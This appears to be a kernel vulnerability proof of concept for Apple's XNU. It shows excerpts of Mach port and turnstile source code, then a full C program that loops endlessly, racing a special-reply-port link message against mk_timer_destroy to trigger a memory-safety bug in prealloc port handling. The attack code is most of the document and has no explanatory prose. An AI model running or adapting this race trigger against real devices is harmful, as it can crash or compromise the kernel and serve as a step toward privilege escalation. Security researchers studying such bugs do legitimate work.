// mach_port_allocate_full()
/*
 * Don't actually honor prealloc requests from user-space
 * (for security reasons, and because it isn't guaranteed anyway).
 * Keep old errors for legacy reasons.
 */
if (qosp->prealloc) {
    if (qosp->len > MACH_MSG_SIZE_MAX - MAX_TRAILER_SIZE) {
        return KERN_RESOURCE_SHORTAGE;
    }
    if (right != MACH_PORT_RIGHT_RECEIVE) {
        return KERN_INVALID_VALUE;
    }
    qosp->prealloc = 0;
}

void
ipc_port_send_update_inheritor(
	ipc_port_t port,
	struct turnstile *send_turnstile,
	turnstile_update_flags_t flags)
{
	ipc_mqueue_t mqueue = &port->ip_messages;
	turnstile_inheritor_t inheritor = TURNSTILE_INHERITOR_NULL;
	struct knote *kn;
	turnstile_update_flags_t inheritor_flags = TURNSTILE_INHERITOR_TURNSTILE;

	imq_held(mqueue);

	if (!ip_active(port)) {
		/* this port is no longer active, it should not push anywhere */
	} else if (port->ip_specialreply) {
		/* Case 1. */
		if (port->ip_sync_bootstrap_checkin && prioritize_launch) {
			inheritor = port->ip_messages.imq_srp_owner_thread;
			inheritor_flags = TURNSTILE_INHERITOR_THREAD;
		}
	} else if (port->ip_receiver_name == MACH_PORT_NULL &&
	    port->ip_destination != NULL) {
		/* Case 2. */
		inheritor = port_send_turnstile(port->ip_destination);
	} else if (ipc_port_watchport_elem(port) != NULL) {
		/* Case 3. */
		if (prioritize_launch) {
			assert(port->ip_sync_link_state == PORT_SYNC_LINK_ANY);
			inheritor = ipc_port_get_watchport_inheritor(port);
			inheritor_flags = TURNSTILE_INHERITOR_THREAD;
		}
	} else if (port->ip_sync_link_state == PORT_SYNC_LINK_WORKLOOP_KNOTE) {
		/* Case 4. */
		inheritor = filt_ipc_kqueue_turnstile(mqueue->imq_inheritor_knote);
	} else if (port->ip_sync_link_state == PORT_SYNC_LINK_WORKLOOP_STASH) {
		/* Case 5. */
		inheritor = mqueue->imq_inheritor_turnstile;
	} else if (port->ip_sync_link_state == PORT_SYNC_LINK_RCV_THREAD) {
		/* Case 6. */
		if (prioritize_launch) {
			inheritor = port->ip_messages.imq_inheritor_thread_ref;
			inheritor_flags = TURNSTILE_INHERITOR_THREAD;
		}
	} else if ((kn = SLIST_FIRST(&mqueue->imq_klist))) {
		/* Case 7. Push on a workloop that is interested */
		if (filt_machport_kqueue_has_turnstile(kn)) {
			assert(port->ip_sync_link_state == PORT_SYNC_LINK_ANY);
			inheritor = filt_ipc_kqueue_turnstile(kn);
		}
	}

	turnstile_update_inheritor(send_turnstile, inheritor,
	    flags | inheritor_flags);
}

#define port_send_turnstile(port)   (IP_PREALLOC(port) ? (port)->ip_premsg->ikm_turnstile : (port)->ip_send_turnstile)

if (IP_PREALLOC(port)) {
		ipc_port_t inuse_port;

		kmsg = port->ip_premsg;
		assert(kmsg != IKM_NULL);
		inuse_port = ikm_prealloc_inuse_port(kmsg);
		ipc_kmsg_clear_prealloc(kmsg, port);

		imq_lock(&port->ip_messages);
		ipc_port_send_turnstile_recompute_push_locked(port);
		/* mqueue and port unlocked */

		if (inuse_port != IP_NULL) {
			assert(inuse_port == port);
		} else {
			ipc_kmsg_free(kmsg);
		}
} 

#include <assert.h>
#include <errno.h>
#include <mach/mach.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

mach_port_t mk_timer_create(void);
kern_return_t mk_timer_destroy(mach_port_t timer);
mach_port_t thread_get_special_reply_port(void);

typedef struct race_th_args_s race_th_args_t;
struct race_th_args_s {
    int start;
    mach_port_t move_port;
    mach_port_t sr_port;
    mach_port_t timer;
};

void *th_send_link(void *arg) {

    race_th_args_t *rta = (race_th_args_t *)arg;
    while (!rta->start);

    struct {
        mach_msg_header_t header;
        uint64_t data;
    } link_sr_msg = {
        .header =
            {
                .msgh_remote_port = rta->move_port,
                .msgh_local_port = rta->sr_port,
                .msgh_bits =
                    MACH_MSGH_BITS_SET(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE, 0, 0),
                .msgh_voucher_port = MACH_PORT_NULL,
                .msgh_id = 0x99999999,
                .msgh_size = sizeof(link_sr_msg),
            },
        .data = 0x6666666666666666,
    };

    kern_return_t __unused kr =
        mach_msg(&link_sr_msg.header,
                 MACH_SEND_MSG | MACH_SEND_OVERRIDE | MACH_SEND_SYNC_OVERRIDE |
                     MACH_SEND_SYNC_BOOTSTRAP_CHECKIN,
                 sizeof(link_sr_msg), 0, MACH_PORT_NULL, 0, MACH_PORT_NULL);
    /*assert(kr == KERN_SUCCESS);*/

    return NULL;
}

void *th_destroy(void *arg) {

    race_th_args_t *rta = (race_th_args_t *)arg;
    while (!rta->start);

    usleep(2);
    mk_timer_destroy(rta->timer);
    return NULL;
}

int go(void) {

    while (1) {

        mach_port_t timer = mk_timer_create();
        printf("[*] timer = 0x%x\n", timer);

        mach_port_t move_port = MACH_PORT_NULL;
        kern_return_t kr =
            mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &move_port);
        assert(kr == KERN_SUCCESS);
        kr =
            mach_port_insert_right(mach_task_self(), move_port, move_port, MACH_MSG_TYPE_MAKE_SEND);

        mach_port_t sr_port = thread_get_special_reply_port();
        /*printf("[*] sr_port = 0x%x\n", sr_port);*/

        struct {
            mach_msg_header_t header;
            mach_msg_body_t body;
            mach_msg_port_descriptor_t port;
        } move_right_msg = {
            .header =
                {
                    .msgh_remote_port = timer,
                    .msgh_local_port = MACH_PORT_NULL,
                    .msgh_bits =
                        MACH_MSGH_BITS_SET(MACH_MSG_TYPE_MAKE_SEND, 0, 0, MACH_MSGH_BITS_COMPLEX),
                    .msgh_voucher_port = MACH_PORT_NULL,
                    .msgh_id = 0x88888888,
                    .msgh_size = sizeof(move_right_msg),
                },
            .body =
                {
                    .msgh_descriptor_count = 1,
                },
            .port =
                {
                    .name = move_port,
                    .disposition = MACH_MSG_TYPE_MOVE_RECEIVE,
                    .type = MACH_MSG_PORT_DESCRIPTOR,
                },
        };

        kr = mach_msg(&move_right_msg.header, MACH_SEND_MSG, sizeof(move_right_msg), 0,
                      MACH_PORT_NULL, 0, MACH_PORT_NULL);
        assert(kr == KERN_SUCCESS);

        race_th_args_t rta = {
            .start = 0,
            .move_port = move_port,
            .sr_port = sr_port,
            .timer = timer,
        };

        pthread_t ths[2];
        pthread_create(&ths[0], NULL, th_send_link, &rta);
        pthread_create(&ths[1], NULL, th_destroy, &rta);

        usleep(5);

        rta.start = 1;

        for (size_t i = 0; i < 2; i++) {
            pthread_join(ths[i], NULL);
        }
        mach_port_destroy(mach_task_self(), timer);
        mach_port_destroy(mach_task_self(), move_port);
        mach_port_destroy(mach_task_self(), sr_port);
    }

    return 0;
}